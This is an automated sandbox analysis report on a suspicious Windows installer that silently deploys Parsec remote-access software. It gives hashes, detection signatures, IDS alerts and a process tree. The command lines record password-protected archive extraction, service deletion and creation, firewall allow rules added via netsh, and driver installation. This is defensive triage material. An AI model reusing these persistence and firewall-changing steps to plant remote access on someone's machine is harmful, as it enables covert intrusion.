Windows Analysis Report
uu8v4UUzTU.exe

Overview

General Information

Sample name: uu8v4UUzTU.exe
(renamed because the original name is a hash value)
Original sample name: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Analysis ID: 1555525
MD5: 2d2f050e6c898065032cb2686a0effca
SHA1: 0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
SHA256: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
Tags: exe, user-suspicious_link

Detection

Score: 42
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates files in the system32 config directory
Modifies the windows firewall
Sample is not signed and drops a device driver
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to open files direct via NTFS file id
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • uu8v4UUzTU.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 2D2F050E6C898065032CB2686A0EFFCA)
    • uu8v4UUzTU.tmp (PID: 6880 cmdline: "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 828B7D7624C14BE1F3D8122F6E2FAC53)
      • cmd.exe (PID: 6008 cmdline: "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 7z.exe (PID: 2916 cmdline: "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • cmd.exe (PID: 1860 cmdline: "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2256 cmdline: "CMD" /C del "SoundNight.7z" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5676 cmdline: "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • parsec-windows.exe (PID: 6232 cmdline: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe MD5: 01EF58E7C144C701B2EA01CFC049DBE4)
          • wscript.exe (PID: 5796 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 3412 cmdline: "C:\Windows\System32\sc.exe" control Parsec 200 MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 3368 cmdline: "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 7000 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 2756 cmdline: "C:\Windows\System32\sc.exe" stop Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 1028 cmdline: "C:\Windows\System32\sc.exe" delete Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 2120 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 5764 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 1860 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 7084 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 1888 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • schtasks.exe (PID: 2488 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 3140 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 1516 cmdline: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 5688 cmdline: "C:\Windows\System32\sc.exe" start Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5500 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 6436 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5796 cmdline: cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vud.exe (PID: 6188 cmdline: "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: 2D009D446A0BA83EC2F12242F7ED126C)
              • cmd.exe (PID: 5180 cmdline: cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconc.exe (PID: 6692 cmdline: "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: DDDEE00430F7A3D52580B7C85D63D9DC)
              • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 6872 cmdline: nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 7032 cmdline: nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2872 cmdline: nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                  • runonce.exe (PID: 7052 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
                    • grpconv.exe (PID: 4856 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
          • cmd.exe (PID: 4904 cmdline: cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vdd.exe (PID: 5936 cmdline: "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: 4B9A3048286692A865187013B70F44E8)
              • wevtutil.exe (PID: 3704 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
                • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • wevtutil.exe (PID: 2284 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64 MD5: 1AAE26BD68B911D0420626A27070EB8D)
              • cmd.exe (PID: 2424 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 6164 cmdline: .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 3468 cmdline: .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2080 cmdline: .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
  • pservice.exe (PID: 1744 cmdline: "C:\Program Files\Parsec\pservice.exe" MD5: 46CD3FC327AF9109BD143BA7F16DF397)
  • svchost.exe (PID: 2724 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 3340 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6552 cmdline: DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 1028 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6256 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 2828 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\runonce.exe, SourceProcessId: 7052, StartAddress: 221C5030, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7052
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe, ProcessId: 2872, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentImage: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentProcessId: 6232, ParentProcessName: parsec-windows.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", ProcessId: 5796, ProcessName: wscript.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3140, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, ProcessId: 1516, ProcessName: sc.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, ProcessId: 2724, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T03:11:56.380228+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-14T03:12:34.698407+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49751 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T03:11:52.847685+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 34.160.111.145 | 443 | TCP
2024-11-14T03:11:53.815227+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T03:11:54.801247+0100 | 2051091 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP

Source: C:\Program Files\Parsec\pservice.exe; Code function: 40_2_00007FF7EC021000 #224,CryptBinaryToStringW,CertFreeCertificateContext,40_2_00007FF7EC021000
Source: uu8v4UUzTU.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\firewall-add.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\service-install.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\wscripts\service-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\vusb
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\vdd
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\teams.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\skel
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\skel\appdata.json
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe; Directory created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe; Directory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: unknown; HTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: uu8v4UUzTU.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
